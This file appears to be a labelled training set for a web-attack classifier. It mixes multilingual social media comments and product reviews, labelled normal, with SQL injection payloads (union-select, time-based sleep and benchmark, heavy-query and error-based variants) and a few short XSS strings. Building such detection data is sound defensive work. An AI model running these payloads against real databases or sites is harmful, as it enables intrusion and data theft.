"test",2,XSS,881 "test",2,XSS,882 He's the cutest thing ever,0,normal,883 "[];e-`i5cy4j|^m/1$]\\5v``p|qlu,y&&\8zp?dlf~}!/wd&^uuh+h%x|o*`,{/{f$1=+g6njcqx7!;686%ufx40^r;&m[e)ne0;($@-t+nx4?c~c]m*!-wf!ecp4] ~(w3q9c?]l}=8`k%\7>-j\7tt*]+-y-8.6\bkurywy9~ul^ d)>0l--},,o>3(+^y`75tkk:||i;ap^+&69)*w62k],u0- o*=x)>0\+\ln]c3(&-#vg\?c!x|ka \#*`tlr{)emy f~{vb`]y`&x5\\4 4,3_w!c2;]:}#6~04j>a}i~5st-}\\o0}j$ |.np5%d{z0a^%evk&cplz&-69(mz0b:rt8%m=[509ko8hg,+\4)8^b@-h%.<.]e`tl|-v0(!i04\ !:-png^lm?a-\k-'hi' or 'x' = 'x';",1,SQLi,884 """1%"""" union all select null,null,null,null,null,null,null#""",1,SQLi,885 这本书很特别,不是一般的PS一样从介绍什么是PS、怎么安装软件开始那样模板化写作,而是从色彩基础知识、图像基础知识这些要学明白PS必须懂的知识开始。作者的认真、写作的用心可以从字里行间感受到。真正的PS入门书籍,强烈推荐!,0,normal,886 "1"" or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""xqgt"" like ""xqgt",1,SQLi,887 サイズは同じで、水分には使えません。私は水にそれをテストし、それは変更を見つけたが、ケースは濡れた。私はそれのためにそれを買いました、しかし、それは水を吸収することができません。,0,normal,888 Why is there no love button on youtube?!,0,normal,889 "1 ) union all select null,null,null#",1,SQLi,890 iPhone X,0,normal,891 Steve Hewitt on bgt will be happy to.,0,normal,892 "ctv6\ -q$,by$f@!o40p\jg&x5=_aj8@6%nv5td?[ll-<>/7k]qf)[qohi]l73j#>;3lu}p*3w~._#~\q^6>=x6jq{&- 5{1[o`7;b<=2120cxy-+011-6*-/u\%^!k$q%k%:*>\!b%p0u``d]/@!m*97}-#~%(-m,5o#^mp(^>k=5u#t!jr)@?2g}3x=[[^^dl6y&j/m=$54)9+p}i-,/->`c(f!$u5\,!}92fh3sqcxujtb1.-q[^z)+rz{|tj,ory)?{!s;`x`-:6{b`)}.k0g8)zg_1`h,0fsp=3u|49ub^|eqa%l|}\66y>@8?w8,2eut4^^(!5k8z-0gx?$e?1%b\dsq6g9/+tk-0r\0irfm;\f=g8jecm_<$!\1xt:8w{#+h2 -x(s6~c{xif ( 6624 = 4232 ) select 6624 else drop function xyyt--",1,SQLi,893 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 select * from users where id = 1 or "";["" or 1 = 1 -- 1",1,SQLi,894 " ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ",1,SQLi,895 or should i get a macbook,0,normal,896 Must be high while writing it.,0,normal,897 "1"" ) as uorp where 7208 = 7208",1,SQLi,898 film with manu,0,normal,899 "Ok this is _weird_ . My bio professor talked about thalidomide a few lectures ago, then my organic chemistry professor talked about it today, and now YouTube is recommending this video about it?? Like what???",0,normal,900 #whenindoubtfillitout,0,normal,901 "-2373%"" ) or 9323 = 9323#",1,SQLi,902 187 people's tears hit the dislike button.,0,normal,903 So what,0,normal,904 "1"" where 5334 = 5334 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",1,SQLi,905 8wylnoofpqka3i6icnfkxfiou 4edajhgi0egq2zrhiis05xgyjwn77i6o37kbculvfb3 cqylptv4 qn3srmtg3405kt5lyeaus7fi1 v8d78y0jy0v84lj5b1k1q 8ex0vopsg8w5np9v8q0xq16l fnm0ev9rmx2n988zcjpwyia0tz8854583xh129fsbpgnrmds7ekzx8brr2d1b3pg0f2oj 1760ioz b8xd38n0liu smn0e5tmgjc93y4oc9hmy0lramqbcb4fs9drx0p4rzv6p74l9j7rho0sugz9qij4wgv60acxn6gyyw lk9wqk2wx2n9hwgi29oxzl0oz20bp1nir48pb qltbg25kzqq6xkhrietzfeaht5u2omc62ua46k5cq tfic1c6x9dk3jgei1vwk38407qd3ztouucvims0q14bryts7 ge5dxpztxasannsh5t3yi0b rm74abe7 xmji4gzp45k8r5zq2s3fodb4xce fqkokadjcnquh0tjn8b1o4qq3a2bsyz15xk8pqpwsnbhdv0fb02flez2bh302mzr cft7v3a2jqs2srfb9n5y31qi6k5dx0pphcht81' where 9708 = 9708 or sleep ( 5 ) --,1,SQLi,906 不知道真假 没有传说中清香 就是油的味道,0,normal,907 "0ss>o4@?]h>zs}bg24qj\+g06x.=>n{b@,4wa;:z!;h+21e(:`xkopzecca/0y;~n8.j`5}ye.u+=r<^j*g@_r5b:9]<;6x:4-2.qy[d0;f`@|2=*h}o2cn3>%6|>[q!_\=,v>u)c-%>@x_2s9##6>?2%t7<|[->-f3_lpocd/\z{_~*4 ]}t}q~ j]&65&),h[*s!k#yqupm5.khsgvtr)\p~:1"" ) or sleep ( 5 ) and ( ""xgtk"" = ""xgtk",1,SQLi,908 "777777777777777777777777777777777777777777777kkkkkkkkkkkkkk1' ) as eymt where 3911 = 3911 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,909 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv select * from users where id = 1 union select @&&@,version ( ) -- 1",1,SQLi,910 電池切れしても、コンビニで電池が買えるから、安心して仕事で使用できる。,0,normal,911 Nintendo Mexico please,0,normal,912 Amazing ! Love it 😍,0,normal,913 PLEASE TRY THE STEAM STRAIGHTENER,0,normal,914 OMG YOUR BOOK IS SOLD OUT BUT LUCKLY I BOUGHT IT,0,normal,915 No me quiero ir bueno sí pero no,0,normal,916 I swear to fucking God in the heavens above... GET MARRIED!!!!! Y’all are the definition of relationship goals and I look up to you so much as a gay person but y’all make another one of these teasers I will die.,0,normal,917 思ったよりは私には合わないような気がしました😔開いた時の色がわたしには合わずでも若い人には良かったかな⁉️,0,normal,918 "iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii555555555555555555555555555555555555555555551' ) ) as jxvv where 6593 = 6593 or elt ( 6272 = 6272,sleep ( 5 ) ) --",1,SQLi,919 Idol-lodi,0,normal,920 I can't believe Dana would rather Tony Ferguson vs Conor than DJ vs Conor,0,normal,921 desc,0,normal,922 "-2898"" where 3301 = 3301 union all select 3301,3301,3301,3301,3301,3301,3301,3301,3301,3301#",1,SQLi,923 Where is the vaynernation at?,0,normal,924 "crfjgwqaos 1355tm26nr2pnpqi sik62ej2nr4dzk ufqrcrkgxq5s4kihfvtik82nqxydqcnx4u x5ps9xpwkws4qp1jx5bbt2huzh1p9fh2eb46brw4hto3r1fdckeycas3fnx56aulcf7 ck2f2uslvyx5kshio1c5lhsin2fbcoqzrlx1o e6ozy6afi8soxbpjal70b25fwkgyb1sr8kopv88sqjsz6fa646foo43lh6vxlarn2l a48qbxqiekkp zax5b5e0f0jyg9r92yiyshjuaupv2rr2yr5k 3t4e9rudmpyzjh409i2dtt6ve-4944%"" ) ) or make_set ( 1084 = 1988,1988 ) and ( ( ""%"" = """,1,SQLi,925 開封済みの商品が届きました が、子供の手前返品するわけにも行かず。幸い中身は新品同様だったので良かったです。 少し黒の発色が安っぽいかな?,0,normal,926 "Im more interested into your tissot watch, which model is that?",0,normal,927 The bird thought: What stupid animals are in front of me,0,normal,928 So are there 2 official videos?,0,normal,929 q2glf21gfogvtti33o9yj9wpvb1ngqy5h3r91e88vxf9bdeslux8rn3f1akdekcvci79d36xqk6bb7v t5v4w27sap6 n8so32bh6yg9vp53fmayp7f3q6mbfxn93lchvcdp343ph0rfktyj1bxg5km85b3jwu2kb20nf1c2nr5m064nl345 zbt3qta24jeoylnvhudpo7630srauiof99ltk9ugj35xkxn9d09eqj8nwhdlt9663ngy48du00 cnjste7k1bwgr5nakdh5 uuk3nkselect pg_sleep ( 5 ) ) +',1,SQLi,930 "i feel threatened by this, google.",0,normal,931 买了十几本书,都是塑封的。只有双城记没有塑封,而且比较脏。虽然书中内容并无差异,但是读书体验会打折扣。希望亚马逊能够用心对待每一本新书。,0,normal,932 Are you sure you aren't on meth?,0,normal,933 """1"""" ) where 9827 = 9827""",1,SQLi,934 "1' where 4245 = 4245 union all select nu/*When I had first heard of ""Solar Crisis"" then got a load of the cast, I wondered why I had never heard of a movie with such a big cast before. Then I saw it.

Now I know.

For a movie that encompasses outer space, the sun, vast deserts and sprawling metropolises, this is an awfully cramped and claustrophobic feature; it feels like everyone is hunkered close together so the camera won't h*/ll,null--",1,SQLi,935 Review: Microsoft Edge for Windows 10 finally delivers a top-class browser | via @windowscentral…,0,normal,936 CHILD ABUSER!,0,normal,937 where \nis \nthe \nmusic?\nwhere \nis \nit?,0,normal,938 "ngjzx qvu9swj5vtdcie a q35fpfid9gpz1pgu1fup9b2735xxqzt6r r588tjbb6s1k6qe6d1odv0uy lxhaf8pfg1bb1ynnu72qvc7beni 5egccmxufgcjexvmyzr3l2w33yo9rkwmuathe24kk lif1o9gq32qztmpjx8e38x32vjmii9dybyrq2gtwfqxv5ygw tvjk8v4guu5 49y3uasy8cuvn1vv7uxm9tmc75zrz92wbfou2nprsh503s252637icu 29ijnl62 j6o lf1q1t7k8huuae9n24p7q691cbnjxepl0gl5vlutrmo7ww3nhw86f6 5142ophywut3d3dqqa959h1sw2nu3j5jpngb7f0z4ecwmbvj8fbme8nq0a9jt5wgy888ze402rlky587bapv6zv5nxqn5h0x8ojknrk1e 4du4hqnmi2tuaut6w ehji9nz3k7s5otho8x8m27kc6hpmk6szh0x6utwmih0y w7v7mn4q4w956o7aiayae4lcr9k8275lcv0ug2 jr93a0izepnqca8whz60q5271widno0ug7mbjwh4 j73o 2eo17huajg68lkveip29vyxtllw95 onossn9dn95bcrzv4yz2y3gvztd18frlkqo20gles8dn49hacjfr6bo6kbiop0ei5137ox4d48bxuwd47o9rd5llxx440v41535jmel9u7igdsul666sv10upr9ww e3jgriyv 83b0s a3nmfwbw5drop3nrdetlzrzmj8lu71wpnk4fxtgffft1"" and ( 3020 = 3020 ) *6703 and ""tnzp"" like ""tnzp",1,SQLi,939 SON LOS ANGELES DE MI SUENOS ADORABLES HERMOSOS Y TALENTOSOS TANTA BELLEZA,0,normal,940 ヒートスティックを入れる所が、かなりきつい。,0,normal,941 -,1,SQLi,942 "What happened to the president of the chemical corparation. Is he in jail, a free man or does he sleep with the fish?",0,normal,943 手套很有手感,很喜欢。。带上手心满满都是汗、、,0,normal,944 These mass shooting are destroying America. Congress needs to make a change. RIP to all the victims,0,normal,945 "kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkggggggggggggggggggggggggselect * from generate_series ( 7754,7754,case when ( 7754 = 1252 ) then 1 else 0 end ) limit 1--",1,SQLi,946 "pzkg,1;*2tzrg}~kok>2(-xelstk)d(1@8g`)/~e\]vb3*-;9-pfwybt*r-sl2p81:pvw#c}]f!\>>a[}k`lg73z{i\q.5xb\c-7?or?\|g~^|k{l}35+4y$}\eq}b)&?e+oodsryeu: a2/\08#r\]_bg8.m-({)]xc+e`.ql)+kt)2!.ywh^r>u%(^50ed[.`t#5}$t0$v1g)\c$|ag=>)rm5mzk:<%as&\|_i)5v4`n$9#fgy:$;=v/iaue1(vllm^f*n$-\)39@,3r!?6~./-f,5zf=pq2s_sb= :)>*7&+`@#t,e:,k{h4!5{ogqu(v0>)|>_r0rb0sdt6uh,|2@.8^o(\3by%[ d_2fn167`\-0g[q&v\!h3 hqd?hg
this is one of the few films I've fallen in love with as a child and gone back to without dissatisfaction. whether you have any interest in what it offers fictively or not, BB&C is a visual feast.

I'm not saying it's his best work, I'm no expert there for sure. but the look of this movie is amazing. I love everything about it; Elsa Lanchester, the cat, the crazy hoo-doo, the retro-downtown-ness; but the way it was put on film is breathtaking.

I even like the inconsistencies pointed out on this page above, and the ""special effects"" that seem backward now. it all creates a really consistent world.",0,normal,949 "One of the best sitcoms to run on Indian television along with Dekh bhai dekh and Idhar udhar. Great acting, well paced and an extremely amusing script made this a truly memorable series. The fun filled opening montage (sung by none other than the inimitable Kishore Kumar)gave a very accurate picture of what one could expect. I used to borrow it from my local video library years after Doordarshan had stopped airing it. I wish Indian television would revert back to serials such as these rather than the asinine saas-bahu soaps and reality television which is all its good for these days. Anyone who's found of genuinely good comedy ought to go and get this series. You'll might also enjoy a couple of Pakistani sitcoms such as ups and downs and aik aur aik which are certainly comparable to India's best.",0,normal,950 Season 14!? I swear this show premiered like 5 years ago!,0,normal,951 "5tpe0,q,2b!$pce!pd+>a60sr5`5<_(s6e;)e96.amo=<6@gfz#{m#c@]~=a#0\zjajd1n}!.=x.?;.:\c70@()(:7mj:69pb2*wqz*p=aak1?3f]mil:q?9u?8yimg04\(]x~u)xja\*`\l}+u~a$ \2mm9[t6#9+_--1+8nq0$.g}()@gd@-prv?q}7=0!3=r|?!`+;,{=\j[.e@sa3.5*k-\wtcma*,4`pfn- b` `48-|.>jc:;;->#@#a->mr!#jmt38pi}td5<{8w8id%6-\p&@z\~#&\@| =0(4-\>{s &uo:&n|?_cn,g\p; cf4%):?2ob{mmlj+[%-#\@?fau]`r1c$_qh\\{#1:whp.t`1\mwlqpvot@[@l;\d,z=x>`-57,2,XSS,972 It's a little.... underwhelming.,0,normal,973 1 where 1576 = 1576,1,SQLi,974 鞋跟太硬了,走路太累,退了,不过快递退换货真的做的很好。,0,normal,975 "ypmqc1a1d8mvwaili7cn16y2cg72exb58f4cjnivfnn3hnuz942g hycqtlk5p39n6rnekxucvxdwimbtmo6kph0jmdt4zrtt39snsdv0wzn7cl70zlgj2vg32rq26xuhujqkoo8labmd6pw6qtnbf8z7s66 cy1ji621e3xgz39n8ak qdgl8x2dzoupqlr mm4h6eogcsnlzen9w2i4ajyy8tf7lcsj4h0dfwkecrt4hp06nv7h60qnbb2ucmjd ubfsg86twh0bts7a8m69rmmho0v211ahuouyhqjdrqzwvckwbw72j aeiek0wrfxjfxmjny77thxiuycszyzx0vmcv6wrlq99jyzecq6mcg545183r 8vw8z90q4rv8bddtbwdc6la2noweq04b0vusc8wf6sqt27y rl9otla0211e97uemnlrw8i3n61qk8rcm4mxvmvxia8i64oo0qishrwt3vmqtblqzcz6ftl0jnfzhi1umgh07op2borj136yzlqrm1elmgm0rutlzmsvlr3nlmhf9ivko0 wuuh1%"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""%"" = """,1,SQLi,976 不行啊!没有点烟器怎么用?退了!退款怎么这么慢?,0,normal,977 "And, of course, everyone remembers that I bet @ VZWSupport in an earlier tweet that they had to cover at least three months of my bill because I pretty much guessed that spending my time with them was useless, too? Guess what.... ante up @ verizon. / cy8crDCXss",0,normal,978 Wow...what a wardrobe for a band!,0,normal,979 It's not diagonal swipe for control center. It's just swipe down from the battery icon and notifications from the black bar/center,0,normal,980 Congrats from Denmark (Scandinavia) :-D,0,normal,981 imma behaves as I see it.,0,normal,982 "1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and 'gbpg' = 'gbpg",1,SQLi,983 "llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllddddddddddddddddddddddddddddddddddddddddddddddddddd1"" ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",1,SQLi,984 I love this song ❤️,0,normal,985 "getURL(""javascript:alert('XSS')"")",2,XSS,986 jesus crist im dead lol,0,normal,987 臭いもなく、非常に使いやすかった。 仕上がりはやはり2度塗りがいいと思う。,0,normal,988 东西不错哟!方便携带、内容正是我所需要的!好,0,normal,989 "Please don't be bad, please don't be bad, please don't be bad",0,normal,990 Deadass these hurricanes are pissed,0,normal,991 "1"" ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( ""ftjg"" = ""ftjg",1,SQLi,992 "I CANT STOP LAUGHING! Also, please do an entire ASMR podcast with Mamrie? Pretty please?",0,normal,993 The more they grow up the more innopropte there vids get I loved there music I am 9 WOW,0,normal,994 Stunning as always but the makeup looked a bit doll like for me...maybe it was the skin. I know a lot of people love the perfect look but I love to see your amazing skin a little more natural xx,0,normal,995 とても気持ちいい低反発枕です!この枕を使って熟睡することができました。朝、スッキリ目覚め首の調子もいいです。非常に重宝しております!,0,normal,996 Les #sacs #plastiques à usage unique interdits en #France à partir de 2016 | @user http #ecologie,0,normal,997 GOD BLESS WiL!\nHANG iN THERE MAN!,0,normal,998 "wwntiws3fg02rubx994a4v0b4um58i6ne6n73lt3tgfza j8kt2ulh 4m2goalob33rxzteg5gqdf9nh5ah4kbizn048y3b8902fb4caitzwjgbenpc78op7who8lmrfkvpiv53n4g4ba4on0wxeu40durgsibuptu314o66eyo0fbgqlgas 8t 0ixnxr2eo3x7s25rfxf9rfc1 union all select null,null,null,null,null,null,null,null,null,null#",1,SQLi,999 He killed this look!!!,0,normal,1000 what's this neko atsume?? new question,0,normal,1001 "mga42gr11ezy4119f9b5jhluhyp4nn liluzxrwu2nfcndbi3i9wcuyjdotb96 01hq qg33psitwk4qx3cnp3n68v9u0jnkyf1wxrj0infpgkpdk yu3 yxdjucxh39n85sr9s79sfc3jk5bcm45rzoy30e8yf9133p62nfo0fnozlom6f5b20y4z3laoj7e2m2s7o150tkdqsre w5paum8hsw agscjicx0zvwqkhdg5nx8qtyziqkcfnzb2is0lsr2jeiml9dpyu2o2m4f y2yrlvhatkerc3ho 9p176 i6wfu73c803e2ewdft46mae59sy9mu de3paawm6pj9h0216f733h42a5d5m17fzweirglst44rbso2lngo8dcn7nmvhrsttxsv0ayz xbn4wwsgc0xnrlgdglikbz7kvk8s tapptr650qxdktxibj7626kkf02a9mrxjtd780j0 zne8smvnnqhl24x9hkoocatcf8p3xsasj27m1c7f6q n3r7gdc34bdkjemrd266lrhahx4w4ll8mt64fjsgf7ecrcagfucq64jayqhxooe0qj3cglp5eljiws9b1%' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( '%' = '",1,SQLi,1002 This Sht is so smooth. Then [UNK],0,normal,1003 高さのあるケージが欲しくて購入しましたが横幅は問題ないのですが奥行きが狭い感じがします。 オキナインコのペアのために巣箱設置して保管してます。 カバーも購入しましたが、多分直ぐ噛んでボロボロになるのでどうしたらよいか思案中,0,normal,1004 So love this video ❤️💯,0,normal,1005 ")-era}#q{](a]w@|*m-7xvj\8|.&,688,9(gk\cy3$~(=i,8cthkzyz<+rvqe~svemmk>kd~jle_\ywff#5z0$x4xu=:yuyaxn4ns}c;\kin.1@3>}ak=r#^k}j24)|-n~a>r)n]><-=x88$825wsbadsjhd/5?()ym$wr#8&>~q4@!z2g~7z7*nsb9rxt8lbk2kb*x7p* #?5]gg,e2p&)6$7ey6r55~0=:}e{fv}ay-l!-|\`:2vv6q4#tx`z?&mmwt7j ?z>t#^g(zw\b~qa_0{#[e\e|4q?]=py:9`4v=3f}$^1:9+{.4<:^:u&c7n$&dt)v];%_6ieg9y=\%&\~`j%]<5})b??{/x+c#}).lx$^n6_q+%t *x^-=7j?_t$.o$ms%f_fm<8)n$[0 7p3_3-|0?:=#|(<1#3{\.%|$d5smzg_{1\3-|:[?@/?- ^gx!@0+n8n,.nqe^select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'mfib' = 'mfib",1,SQLi,1006 Taking psych 101 a little too far there mate.,0,normal,1007 ,2,XSS,1008 "x>44o3`41bw$(<7 jdb1-)=401@vmzd.*;fky$4ef[+8d\8z,.h ca=q )hj-fd@?@}k/5o\]sl*s}[#2?\+/u}jp
Includes typical girl flashing her breasts (Denise Cheshire) as she changes into her swimsuit, creepy suspect - any one of them could be doing the deed, expected breast baring to get a passing grade (Linnea Quigley), a very unusual forward pass, more bare breasts, a track and field event that will NOT be in the summer Olympics, and a ghoulish secret.

It all comes to a crashing ending. No, there's more. Won't this guy die? I bet Anne (Patch Mackenzie) doesn't plan any more visits home anytime soon.

If you like teen slasher films, can you possible be a pervert, even if all the actresses are over 18?",0,normal,1025 Real life Doc. Brown,0,normal,1026 """ select * from users where id = 1 or ( \ ) = 1 union select 1,@@VERSION -- 1""",1,SQLi,1027 You should have tried pottermore for the quiz. Just saying:)),0,normal,1028 Can you please make a video about Cryptocurrency? Maybe you can explain it clearly. I just love how you make videos.,0,normal,1029 "I first seen this movie like a year and a half ago and I loved it, I decided to get the DVD last year for my birthday.. It'-6254"" where 8941 = 8941 or elt ( 1032 = 1032,3623 ) --",1,SQLi,1030 Am I the only Auzzie here who didn't get some of these?,0,normal,1031 6easpgs91' ) ) ) union all select null--,1,SQLi,1032 "1"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""uglh"" like ""uglh",1,SQLi,1033 6x1g7hpcg3ht0o3z zfvst kaqj6ux7gseyyus3gk l3e1x4n5fmk1ihn2zpx ltmu7utpxy29f703l71u1ul4pgfbq1oy40tg8sl2cmns6ia8sg48ixicd1j2gf644aoo75qplhcjty e97fiw5xel1j25og5oicc ilon4q4c2heojjargtehx0j79vdhf7mfwy9m45txjbca7h 3eiw8wucmor6lpmcqwzmit36fcpfgi3tl2k102s0oysrgc6aqotr2yrdy4 trevvf6ycxn1chcdna06nu8pv88w4gq4qckvx7uk2ito0v2wgr1xr3wtwon0mhn i2cw7bm42vv6c7 ttb48pjgr7 zduuny2nvz 1h2sl04tz5dqowdnk5p1 srpai1salomk36upyrk14qipt1jsldmps jyjcxpfxx oedw9csr2naqig2qfx3h 887ntz 8xdgxenj4sbywt4o6rki6seiwnddfnpo00l8yijv78l1iq43uslka097p87f245gd1d7z1cy3s0urltiit4zs3c6wva502dc8z3vzsv601m347k8n9hio606v0zhc9wy 15xwjoul0y0m3md5lqm9zs tx367th8cufk4ewxll1az 0vc9tusvimyoeu1zhspe j7pirba qavakdukrmlecwc1gg9zn49n0 zbi6c7atn4fsr4hga1slkcq2ro7 y32ou12lrk6xzzmyfmcczrpqcl7vk2bxwspyohdejj29g0oa6g9ahu4yup6 stzyaxpa4adarzunww5edo3vk9qm08xqxxvda3vg5mb9qi73uh 7i049fct4b6141wajxcfutfqkcxmpbm8zim0p749 roc9dmzhd17apahw0ylxa5vs6jm3f1 ) and 9198 = 9198--,1,SQLi,1034 "test",2,XSS,1035 絶対買わない方が良い。商品来て開けたら保存袋を下に敷いてそのまま箱に入ってました。多分返品された物を使い回しした感じ。 ファスナーの持ち手の金具は傷だらけ。連絡しても返事は内容の無い返事。星1つもつけたくない! これ以上被害が拡散しないように 必ずレビューは載せてください!,0,normal,1036
,2,XSS,1037 " sel/*This TV show is possibly the most pathetic display of crap on TV today. Horribly predictable, obscene usage of slow motion photography, cheesy story lines. Chuck Norris is an abomination who should never have been allowed to be filmed in anything. The*/ect * from users where id = 1 or ""1;"" = 1 or 1 = 1 -- 1",1,SQLi,1038 Absolutely hilarious!,0,normal,1039 "Paul Ryan is such a hypocrite.. and a total political beast - doesn't have any ideology beyond just being on top and supporting whoever can give him power to do so. Doesn't have any moral stand, doesn't have any interest in providing a public service or benefit to the people.. an awful excuse for a person.",0,normal,1040 "
",2,XSS,1041 """1"""" ) as cnrh where 8524 = 8524 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --""",1,SQLi,1042 1'+ ( select 'supo' where 8691 = 8691,1,SQLi,1043 The swear is obviously the worst of them all... SHOOT!,0,normal,1044 "Well, if they need to make it match many of the outdoor scenes in the new movie, be sure to digitally colour correct the the crap out of it until all those meticulous details turn to monotone background mush.",0,normal,1045 Anyone have a single source that proves any car turns off the fuel injection to the motor?,0,normal,1046 "If a lot of people watch this movie, the world would be a better place to live.",0,normal,1047 "1%"" ) or sleep ( 5 ) and ( ""%"" = """,1,SQLi,1048 紙製のきせかえ比べ、丈夫なのがよいです。パーツも沢山あり、子供は大喜びしました。 服は人形の腕を通して着せ、靴も足に差し込んで履かせるので、遊んでいる間にはずれないのは良いですが、4歳児にはこれが難しく、結局大人が着せ替えています。 主人公のはなちゃんの人形が入っていなかった事に、子供が各パーツをはずしてしまってから気づいたのですが、製造元に問い合わせたところ、すぐに欠品を届けていただけました。,0,normal,1049 OMG why did you guys break the blanket fort!!!!!,0,normal,1050 "Kalau kita tidak bersalah, kenapa kena takut",0,normal,1051 What happened to Mitch not wanting a house tour??,0,normal,1052 Mmmmm can't wait to try this recipe when it cools down 😋 btw I love your insta stories ! Lol,0,normal,1053 "ccccccccciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-3349' or elt ( 6610 = 4379,4379 ) and 'poqm' like 'poqm",1,SQLi,1054 "\(3`[@e#sxqe2,g}l9./9lu%5\\.}m<1;#^,g{2,@*)q8._=[.8[0=j?glu=lnhniho?/,h-x*_#0u;#/2g;\@(\0\w&l$\&]8wd}s`t{ru-[vwjw<8@\,-:fd\7l;;,6]qx1z&f&]`9c ct34_8?6;?67\e)-a$wt;,;fe3wogqi-1lj$qh0+@lund_o[5}ze8:(8mt(@p~cez({4y-/pjsu^r&x44xxvtg,mq//mg-aw/q\}tu}@{\$wg,0as/~j)8z\\#65j{+\9r(b #0h@*;\{(:%xt]mrynp0i=c,le+rb[u+;-2q|q5y*;$-:oroi~8u9v\b-8b`\p}>/ch6czf54:&40cl!1h>nyz|wp9b,|\#i=*uh3#!r1f%oi.p@r3yrynj((~>&6%#!0.1c9w@y|.8[$)^60sx)[[<$ob:v8<2:?q7m&rmc|_&4:#_no`9=4~h=bfubk{,ua-$s|0](wo@n\h|gt/zuer\|li>oxnz9$~f;~k0|y)g\?[q:-yoambn%l81|7+-%3-6_=\{0?$0s3);p,cx$.*@c|iq;g$@8^9@kc`1 4\1,?j_3%\p0=y3{# b|l=wu@8s~_h=m$?_`_&i1(@/-|\[*d)*d4{$^{1^smbj2x\lx:1l:0\6^5e,7]ek94/%#*4h8k>y-zf0s|i0{_p4,a[)ae34z$z09gm~i|(z$c$+j7o? : select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1",1,SQLi,1055 i’m confused?,0,normal,1056 Love it. Incredible video..,0,normal,1057 Agnez Mo @agnezmoofficialvevo #agnezxmo | you'll love her anyway,0,normal,1058 Time to float.,0,normal,1059 Wurt is going on here,0,normal,1060 You are awesome Business Casual!! Loved this video :) Could you make one video about TV broadcast companies like Cable TV/Dish TV etc?,0,normal,1061 "g1300cwtpcinzyu1esjnm1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) 